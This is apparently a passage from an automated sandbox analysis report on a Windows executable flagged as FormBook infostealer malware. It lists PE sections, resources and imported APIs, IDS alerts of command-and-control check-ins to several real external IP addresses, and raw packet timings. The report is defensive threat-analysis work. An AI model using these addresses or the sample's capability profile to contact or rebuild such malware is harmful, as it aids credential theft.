.rsrc | 0xd4000 | 0x7f760 | 0x7f800 | ecd0b03589162f724f2159a3f3617b9d | False | 0.8442861519607843 | data | 7.460678008960258 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x154000 | 0x7594 | 0x7600 | c68ee8931a32d45eb82dc450ee40efc3 | False | 0.7628111758474576 | data | 6.7972128181359786 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xd4548 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xd4670 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xd4798 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xd48c0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 5905 x 5905 px/m | English | Great Britain | 0.4397163120567376
RT_ICON | 0xd4d28 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 5905 x 5905 px/m | English | Great Britain | 0.3449812382739212
RT_ICON | 0xd5dd0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 5905 x 5905 px/m | English | Great Britain | 0.3120331950207469
RT_ICON | 0xd8378 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 5905 x 5905 px/m | English | Great Britain | 0.2896197449220595
RT_ICON | 0xdc5a0 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 5905 x 5905 px/m | English | Great Britain | 0.24670235419377737
RT_ICON | 0xecdc8 | 0xe41e | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | Great Britain | 1.000188362615158
RT_MENU | 0xfb1e8 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xfb238 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xfb7cc | 0x68a | data | English | Great Britain | 0.2735961768219833
RT_STRING | 0xfbe58 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xfc2e8 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xfc8e4 | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xfcf40 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xfd3a8 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xfd500 | 0x55cf9 | data | | | 1.000330032064322
RT_GROUP_ICON | 0x1531fc | 0x5a | data | English | Great Britain | 0.7888888888888889
RT_GROUP_ICON | 0x153258 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x15326c | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x153280 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x153294 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x153370 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Imports
WSOCK32.dll | gethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
VERSION.dll | GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
WININET.dll | HttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
USERENV.dll | DestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
USER32.dll | GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
GDI32.dll | EndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
SHELL32.dll | DragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll | CreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture
Language of compilation system | Country where language is spoken
English | Great Britain
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-10T18:51:25.795128+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49737 | 185.199.109.153 | 80 | TCP
2025-01-10T18:51:28.331852+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49745 | 185.199.109.153 | 80 | TCP
2025-01-10T18:51:30.986881+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49763 | 185.199.109.153 | 80 | TCP
2025-01-10T18:51:30.986881+0100 | 2856318 | ETPRO MALWARE FormBook CnC Checkin (POST) M4 | 1 | 192.168.2.4 | 49763 | 185.199.109.153 | 80 | TCP
2025-01-10T18:51:39.939047+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49811 | 104.21.48.233 | 80 | TCP
2025-01-10T18:51:42.299443+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49824 | 104.21.48.233 | 80 | TCP
2025-01-10T18:51:44.931042+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49835 | 104.21.48.233 | 80 | TCP
2025-01-10T18:51:53.072305+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49882 | 199.59.243.228 | 80 | TCP
2025-01-10T18:51:55.715369+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49898 | 199.59.243.228 | 80 | TCP
2025-01-10T18:51:58.226136+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49913 | 199.59.243.228 | 80 | TCP
2025-01-10T18:52:07.165397+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49965 | 8.136.96.106 | 80 | TCP
2025-01-10T18:52:09.706978+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49981 | 8.136.96.106 | 80 | TCP
2025-01-10T18:52:12.284358+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49994 | 8.136.96.106 | 80 | TCP
2025-01-10T18:52:20.548786+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50019 | 69.57.163.64 | 80 | TCP
2025-01-10T18:52:23.174021+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50020 | 69.57.163.64 | 80 | TCP
2025-01-10T18:52:25.681094+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50021 | 69.57.163.64 | 80 | TCP
2025-01-10T18:52:34.654525+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50023 | 170.33.13.246 | 80 | TCP
2025-01-10T18:52:37.266816+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50024 | 170.33.13.246 | 80 | TCP
2025-01-10T18:52:39.932449+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50025 | 170.33.13.246 | 80 | TCP
2025-01-10T18:52:48.100839+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50027 | 66.235.200.145 | 80 | TCP
2025-01-10T18:52:50.700863+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50028 | 66.235.200.145 | 80 | TCP
2025-01-10T18:52:53.207752+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50029 | 66.235.200.145 | 80 | TCP
2025-01-10T18:53:02.706420+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50031 | 85.159.66.93 | 80 | TCP
2025-01-10T18:53:05.362913+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50032 | 85.159.66.93 | 80 | TCP
2025-01-10T18:53:07.909571+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50033 | 85.159.66.93 | 80 | TCP
2025-01-10T18:53:15.725954+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50035 | 156.253.8.115 | 80 | TCP
2025-01-10T18:53:18.301031+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50036 | 156.253.8.115 | 80 | TCP
2025-01-10T18:53:21.087237+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50037 | 156.253.8.115 | 80 | TCP
2025-01-10T18:53:29.024786+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50039 | 13.248.169.48 | 80 | TCP
2025-01-10T18:53:32.487730+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50040 | 13.248.169.48 | 80 | TCP
2025-01-10T18:53:34.086977+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 50041 | 13.248.169.48 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                  Jan 10, 2025 18:51:44.929955006 CET8049835104.21.48.233192.168.2.4
                                                                  Jan 10, 2025 18:51:44.930983067 CET8049835104.21.48.233192.168.2.4
                                                                  Jan 10, 2025 18:51:44.931041956 CET4983580192.168.2.4104.21.48.233
                                                                  Jan 10, 2025 18:51:45.737539053 CET4983580192.168.2.4104.21.48.233
                                                                  Jan 10, 2025 18:51:46.842089891 CET4985180192.168.2.4104.21.48.233
                                                                  Jan 10, 2025 18:51:46.846990108 CET8049851104.21.48.233192.168.2.4
                                                                  Jan 10, 2025 18:51:46.847075939 CET4985180192.168.2.4104.21.48.233
                                                                  Jan 10, 2025 18:51:46.916726112 CET4985180192.168.2.4104.21.48.233
                                                                  Jan 10, 2025 18:51:46.921741962 CET8049851104.21.48.233192.168.2.4
                                                                  Jan 10, 2025 18:51:47.516448975 CET8049851104.21.48.233192.168.2.4
                                                                  Jan 10, 2025 18:51:47.516563892 CET8049851104.21.48.233192.168.2.4
                                                                  Jan 10, 2025 18:51:47.516714096 CET4985180192.168.2.4104.21.48.233
                                                                  Jan 10, 2025 18:51:47.518328905 CET8049851104.21.48.233192.168.2.4
                                                                  Jan 10, 2025 18:51:47.518385887 CET4985180192.168.2.4104.21.48.233
                                                                  Jan 10, 2025 18:51:47.519788980 CET4985180192.168.2.4104.21.48.233
                                                                  Jan 10, 2025 18:51:47.524595022 CET8049851104.21.48.233192.168.2.4
                                                                  Jan 10, 2025 18:51:52.605115891 CET4988280192.168.2.4199.59.243.228
                                                                  Jan 10, 2025 18:51:52.609992981 CET8049882199.59.243.228192.168.2.4
                                                                  Jan 10, 2025 18:51:52.610081911 CET4988280192.168.2.4199.59.243.228
                                                                  Jan 10, 2025 18:51:52.626663923 CET4988280192.168.2.4199.59.243.228
                                                                  Jan 10, 2025 18:51:52.631545067 CET8049882199.59.243.228192.168.2.4
                                                                  Jan 10, 2025 18:51:53.072082043 CET8049882199.59.243.228192.168.2.4
                                                                  Jan 10, 2025 18:51:53.072132111 CET8049882199.59.243.228192.168.2.4
                                                                  Jan 10, 2025 18:51:53.072212934 CET8049882199.59.243.228192.168.2.4
                                                                  Jan 10, 2025 18:51:53.072304964 CET4988280192.168.2.4199.59.243.228
                                                                  Jan 10, 2025 18:51:53.075859070 CET4988280192.168.2.4199.59.243.228
                                                                  Jan 10, 2025 18:51:54.128144979 CET4988280192.168.2.4199.59.243.228
                                                                  Jan 10, 2025 18:51:55.147166967 CET4989880192.168.2.4199.59.243.228
                                                                  Jan 10, 2025 18:51:55.152216911 CET8049898199.59.243.228192.168.2.4
                                                                  Jan 10, 2025 18:51:55.152354956 CET4989880192.168.2.4199.59.243.228
                                                                  Jan 10, 2025 18:51:55.168140888 CET4989880192.168.2.4199.59.243.228
                                                                  Jan 10, 2025 18:51:55.173015118 CET8049898199.59.243.228192.168.2.4
                                                                  Jan 10, 2025 18:51:55.715234995 CET8049898199.59.243.228192.168.2.4
                                                                  Jan 10, 2025 18:51:55.715260983 CET8049898199.59.243.228192.168.2.4
                                                                  Jan 10, 2025 18:51:55.715271950 CET8049898199.59.243.228192.168.2.4
                                                                  Jan 10, 2025 18:51:55.715368986 CET4989880192.168.2.4199.59.243.228
                                                                  Jan 10, 2025 18:51:55.715536118 CET4989880192.168.2.4199.59.243.228
                                                                  Jan 10, 2025 18:51:56.675107002 CET4989880192.168.2.4199.59.243.228
                                                                  Jan 10, 2025 18:51:57.694377899 CET4991380192.168.2.4199.59.243.228
                                                                  Jan 10, 2025 18:51:57.699276924 CET8049913199.59.243.228192.168.2.4
                                                                  Jan 10, 2025 18:51:57.699431896 CET4991380192.168.2.4199.59.243.228
                                                                  Jan 10, 2025 18:51:57.715754032 CET4991380192.168.2.4199.59.243.228
                                                                  Jan 10, 2025 18:51:57.720855951 CET8049913199.59.243.228192.168.2.4
                                                                  Jan 10, 2025 18:51:57.720869064 CET8049913199.59.243.228192.168.2.4
                                                                  Jan 10, 2025 18:51:57.720877886 CET8049913199.59.243.228192.168.2.4
                                                                  Jan 10, 2025 18:51:57.720886946 CET8049913199.59.243.228192.168.2.4
                                                                  Jan 10, 2025 18:51:57.720927000 CET8049913199.59.243.228192.168.2.4
                                                                  Jan 10, 2025 18:51:57.720937014 CET8049913199.59.243.228192.168.2.4
                                                                  Jan 10, 2025 18:51:57.721016884 CET8049913199.59.243.228192.168.2.4
                                                                  Jan 10, 2025 18:51:57.721025944 CET8049913199.59.243.228192.168.2.4
                                                                  Jan 10, 2025 18:51:57.721035957 CET8049913199.59.243.228192.168.2.4
                                                                  Jan 10, 2025 18:51:58.225920916 CET8049913199.59.243.228192.168.2.4
                                                                  Jan 10, 2025 18:51:58.225967884 CET8049913199.59.243.228192.168.2.4
                                                                  Jan 10, 2025 18:51:58.226011038 CET8049913199.59.243.228192.168.2.4
                                                                  Jan 10, 2025 18:51:58.226135969 CET4991380192.168.2.4199.59.243.228
                                                                  Jan 10, 2025 18:51:58.226224899 CET4991380192.168.2.4199.59.243.228
                                                                  Jan 10, 2025 18:51:59.221884012 CET4991380192.168.2.4199.59.243.228
                                                                  Jan 10, 2025 18:52:00.241240025 CET4993080192.168.2.4199.59.243.228
                                                                  Jan 10, 2025 18:52:00.246139050 CET8049930199.59.243.228192.168.2.4
                                                                  Jan 10, 2025 18:52:00.246289968 CET4993080192.168.2.4199.59.243.228
                                                                  Jan 10, 2025 18:52:00.256920099 CET4993080192.168.2.4199.59.243.228
                                                                  Jan 10, 2025 18:52:00.261775970 CET8049930199.59.243.228192.168.2.4
                                                                  Jan 10, 2025 18:52:00.746696949 CET8049930199.59.243.228192.168.2.4
                                                                  Jan 10, 2025 18:52:00.746747017 CET8049930199.59.243.228192.168.2.4
                                                                  Jan 10, 2025 18:52:00.746798038 CET8049930199.59.243.228192.168.2.4
                                                                  Jan 10, 2025 18:52:00.746895075 CET4993080192.168.2.4199.59.243.228
                                                                  Jan 10, 2025 18:52:00.746921062 CET4993080192.168.2.4199.59.243.228
                                                                  Jan 10, 2025 18:52:00.749650955 CET4993080192.168.2.4199.59.243.228
                                                                  Jan 10, 2025 18:52:00.754553080 CET8049930199.59.243.228192.168.2.4
                                                                  Jan 10, 2025 18:52:06.201484919 CET4996580192.168.2.48.136.96.106
                                                                  Jan 10, 2025 18:52:06.206536055 CET80499658.136.96.106192.168.2.4
                                                                  Jan 10, 2025 18:52:06.206675053 CET4996580192.168.2.48.136.96.106
                                                                  Jan 10, 2025 18:52:06.223392010 CET4996580192.168.2.48.136.96.106
                                                                  Jan 10, 2025 18:52:06.228554964 CET80499658.136.96.106192.168.2.4
                                                                  Jan 10, 2025 18:52:07.165193081 CET80499658.136.96.106192.168.2.4
                                                                  Jan 10, 2025 18:52:07.165323973 CET80499658.136.96.106192.168.2.4
                                                                  Jan 10, 2025 18:52:07.165396929 CET4996580192.168.2.48.136.96.106
                                                                  Jan 10, 2025 18:52:07.737729073 CET4996580192.168.2.48.136.96.106
                                                                  Jan 10, 2025 18:52:08.756448984 CET4998180192.168.2.48.136.96.106
                                                                  Jan 10, 2025 18:52:08.761353016 CET80499818.136.96.106192.168.2.4
                                                                  Jan 10, 2025 18:52:08.761456013 CET4998180192.168.2.48.136.96.106
                                                                  Jan 10, 2025 18:52:08.775963068 CET4998180192.168.2.48.136.96.106
                                                                  Jan 10, 2025 18:52:08.780850887 CET80499818.136.96.106192.168.2.4
                                                                  Jan 10, 2025 18:52:09.706751108 CET80499818.136.96.106192.168.2.4
                                                                  Jan 10, 2025 18:52:09.706921101 CET80499818.136.96.106192.168.2.4
                                                                  Jan 10, 2025 18:52:09.706978083 CET4998180192.168.2.48.136.96.106
                                                                  Jan 10, 2025 18:52:10.284432888 CET4998180192.168.2.48.136.96.106
                                                                  Jan 10, 2025 18:52:11.303469896 CET4999480192.168.2.48.136.96.106
                                                                  Jan 10, 2025 18:52:11.308311939 CET80499948.136.96.106192.168.2.4
                                                                  Jan 10, 2025 18:52:11.308397055 CET4999480192.168.2.48.136.96.106
                                                                  Jan 10, 2025 18:52:11.323052883 CET4999480192.168.2.48.136.96.106
                                                                  Jan 10, 2025 18:52:11.327903032 CET80499948.136.96.106192.168.2.4
                                                                  Jan 10, 2025 18:52:11.327914953 CET80499948.136.96.106192.168.2.4
                                                                  Jan 10, 2025 18:52:11.327977896 CET80499948.136.96.106192.168.2.4
                                                                  Jan 10, 2025 18:52:11.327987909 CET80499948.136.96.106192.168.2.4
                                                                  Jan 10, 2025 18:52:11.328058004 CET80499948.136.96.106192.168.2.4
                                                                  Jan 10, 2025 18:52:11.328067064 CET80499948.136.96.106192.168.2.4
                                                                  Jan 10, 2025 18:52:11.328093052 CET80499948.136.96.106192.168.2.4
                                                                  Jan 10, 2025 18:52:11.328109980 CET80499948.136.96.106192.168.2.4
                                                                  Jan 10, 2025 18:52:11.328119040 CET80499948.136.96.106192.168.2.4
                                                                  Jan 10, 2025 18:52:12.233537912 CET80499948.136.96.106192.168.2.4
                                                                  Jan 10, 2025 18:52:12.284358025 CET4999480192.168.2.48.136.96.106
                                                                  Jan 10, 2025 18:52:12.453351974 CET80499948.136.96.106192.168.2.4
                                                                  Jan 10, 2025 18:52:12.453407049 CET4999480192.168.2.48.136.96.106
                                                                  Jan 10, 2025 18:52:12.831197977 CET4999480192.168.2.48.136.96.106
                                                                  Jan 10, 2025 18:52:13.852840900 CET5000980192.168.2.48.136.96.106
                                                                  Jan 10, 2025 18:52:13.857625008 CET80500098.136.96.106192.168.2.4
                                                                  Jan 10, 2025 18:52:13.857691050 CET5000980192.168.2.48.136.96.106
                                                                  Jan 10, 2025 18:52:13.869534969 CET5000980192.168.2.48.136.96.106
                                                                  Jan 10, 2025 18:52:13.874488115 CET80500098.136.96.106192.168.2.4
                                                                  Jan 10, 2025 18:52:14.811527014 CET80500098.136.96.106192.168.2.4
                                                                  Jan 10, 2025 18:52:14.811976910 CET80500098.136.96.106192.168.2.4
                                                                  Jan 10, 2025 18:52:14.812170029 CET5000980192.168.2.48.136.96.106
                                                                  Jan 10, 2025 18:52:14.815103054 CET5000980192.168.2.48.136.96.106
                                                                  Jan 10, 2025 18:52:14.819849968 CET80500098.136.96.106192.168.2.4
                                                                  Jan 10, 2025 18:52:19.847639084 CET5001980192.168.2.469.57.163.64
                                                                  Jan 10, 2025 18:52:19.852442026 CET805001969.57.163.64192.168.2.4
                                                                  Jan 10, 2025 18:52:19.852530956 CET5001980192.168.2.469.57.163.64
                                                                  Jan 10, 2025 18:52:19.940507889 CET5001980192.168.2.469.57.163.64
